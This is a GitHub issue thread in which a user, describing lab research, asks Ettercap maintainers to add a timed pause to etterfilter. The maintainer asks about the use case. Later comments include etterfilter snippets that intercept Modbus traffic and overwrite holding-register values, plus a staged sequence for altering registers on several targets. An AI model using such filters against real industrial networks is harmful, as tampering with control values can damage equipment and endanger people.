luismartinsez
commented
5 years ago Open luismartinsez opened 5 years ago
luismartinsez
commented
5 years ago luismartinsez
commented
5 years ago Just wondering if you have sometime to look into this request
luismartinsez
commented
5 years ago Could you kindly advise if this is possible?
koeppea
commented
5 years ago I think w/o having it tested, it won't have the desired effect.
I think you want only the filtering engine of ettercap set to sleep for a certain amount of time.
However the filtering engine doesn't support such a feature.
Even using exec('/bin/sleep'); wouldn't have the desired effect, because it forks a new child process and then fires up the sleep command. But the parent process doesn't wait for the child to complete or abort.
Also this requirement sound pretty uncommon so that a implementation wouldn't probably be of benefit for more than just you? Or do could you outline a practical common use-case which would require such a functionality for also other people?
luismartinsez
commented
5 years ago Thanks for your response.
I believe it's an important feature because in a modern network there are several layers - enterprise layer, perimeter layer, manufacturing layer etc. When a virus enters in one of the weak networks layers, it just waits in the entered network and monitor, study, analyze & capture network activities where virus resides. The virus decides the next move after analysing the behaviour of network packets. This is because modern networks are protected using rigid security measures so it is impossible to make a desired attack in first attempt. Recent academic journals on network attacks show a virus or an intruder cannot establish a successful attack on first attempt, however the attacker remains silent on the network for several days or weeks to study network activities. (I can provide several published journals if required)
Now a days, we researchers heavily rely on ettercap to perform various real time analysis in University labs. It would be helpful for students if you can incorporate this feature.
Thanks
koeppea
commented
5 years ago So to get it right only the filtering engine should pause but MITM and forwarding through ettercap should continue? BTW: I'd be anyway interested in a published article desiring this.
luismartinsez
commented
5 years ago I have e-mailed you (format_c) some academic journals pointing the usage.
Filter engine should continue to the block where "pause" has been defined. In the following example, filtering engine must be processing Block 1 and wait 60 seconds before executing Block 2.
When it reaches "sleep 30" section after Block 2, filtering engine must be processing Block 1 and Block 2 and wait 30 seconds before executing Block 3.
When it reaches "sleep 90" section after Block 3, filtering engine must be processing Block 1, Block 2 ,Block 3 and wait 90 seconds before executing Block 4.
When it reaches "sleep 120" section after Block 4, filtering engine must be processing Block 1, Block 2 ,Block 3, Block 4 and wait 120 seconds before executing Block 5. Once it passed "sleep(120)", all Blocks from 1 through to 5 must be running at this stage.
In short, the predecessor blocks must be active at each pause.
sample.filter
if (ip.proto == UDP || ip.proto == TCP && tcp.src == 80) { }
sleep 60; # Delay for 1 minute (60 seconds)
if (ip.proto == TCP && tcp.src == 80 || ip.proto == UDP) { }
sleep 30; # Delay for 30 Seconds
if (ip.proto == TCP && tcp.src == 160 || ip.proto == UDP) { }
sleep 90; # Delay for 90 Seconds
sleep(120) # Delay for 2 minutes (120 seconds)
if (ip.proto == TCP && tcp.src == 25 || ip.proto == UDP) { }
luismartinsez
commented
5 years ago Understanding your very busy schedule, I’m sending you this note as a kind reminder to understand if it possible to have "Sleep" command incorporated in Ettercap. We're completely stuck and unable to proceed any further with our research without having this feature.
Appreciate your response
koeppea
commented
5 years ago I haven't had time yet to investigate further. It's still on my list. If you need this that urgently, you're free to contribute yourself. It's Open Source.
luismartinsez
commented
5 years ago Thanks for your response. Rightly guessed you're occupied with several other important matters.
Regarding contribution, unfortunately we don't have time & resources allocated for development and for this reason we have decided to opt a ready-to-use tool like Ettercap :-)
Do you know of a marketplace from where we can hire a programmer to accomplish this feature in Ettercap? We will contribute the changes to Ettercap community if you can suggest an Ettercap programmer.
On Wed, Aug 21, 2019 at 1:05 PM Alexander Köppe notifications@github.com wrote:
I haven't had time yet to investigate further. It's still on my list. If you need this that urgently, you're free to contribute yourself. It's Open Source.
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/Ettercap/ettercap/issues/956?email_source=notifications&email_token=ALSK45FFJGHHLEUITJ4BLM3QFTEJ5A5CNFSM4IENAGWKYY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOD4YOEJY#issuecomment-523297319, or mute the thread https://github.com/notifications/unsubscribe-auth/ALSK45DYZ6Q7BUYZ53XLACDQFTEJ5ANCNFSM4IENAGWA .
koeppea
commented
5 years ago No sorry. I'm not aware of such a marketplace.
luismartinsez
commented
5 years ago I have sent an update to your e-mail. This request can be closed, if you prefer.
koeppea
commented
5 years ago Thanks. I prefer to let it open until I’ve evaluated if this would actually be possible to implement w/o ripping the whole application architecture apart.
Especially the filtering engine is very tricky.
luismartinsez
commented
5 years ago No problem. Thanks :-)
luismartinsez
commented
5 years ago Adding to the above - I will have my testbed for some more time if you want to test this feature once you finish evaluation.
koeppea
commented
5 years ago Could you produce a packet capture reflecting that behaviour?
luismartinsez
commented
5 years ago I am following the steps below, in sequential order. You can note that sessions use a unique Ethernet interface.
Send new values to Target1
Register 1 - if 0 then 650 Register 2 - if 225 then 3000 Register 3 - if 0 then 125
Triggered sleep2.ef after 30 seconds in a new terminal session
Send new values to Target2
Register 1 - 999 Register 2 - 650 Register 3 - 3000
Triggered sleep3.ef after 50 seconds in a new terminal session
Send new values to Target3
Register 1 - 850 Register 3 - 8888 Register 4 - 7777
The only limitation with this method is that we can attack only one target at a time. Ideally the system should support conditions for all targets in each step - similar to sleepreq.filter. I can combine three scripts into one if you can find a way to define sleep somewhere in the program.
Attached pcap and filters sleep.zip
Hi Alexander,
A quick question:
In Etterfilter, is it possible to pause the program block for 5 minutes before continuing?
For example:
First block
if (tcp.src == 502 && DATA.data+11 == "\x00\xe1") { DATA.data + 11 = "\x0b\xb8"; msg("Holding Register 1 data replaced"); }
sleep 5m # Waits 5 minutes.
Second block
if (tcp.src == 502 && DATA.data+12 == "\x00\x00") { DATA.data + 12 = "\x00\x7d"; msg("Holding Register 2 data replaced"); }
Sleep command is used in Shell script to pause between blocks.
Is there an equivalent command in etterfilter? At present, the unload filter option will completely stop all program blocks. I want the filter to be active and first block to be running during pause period
Is this possible?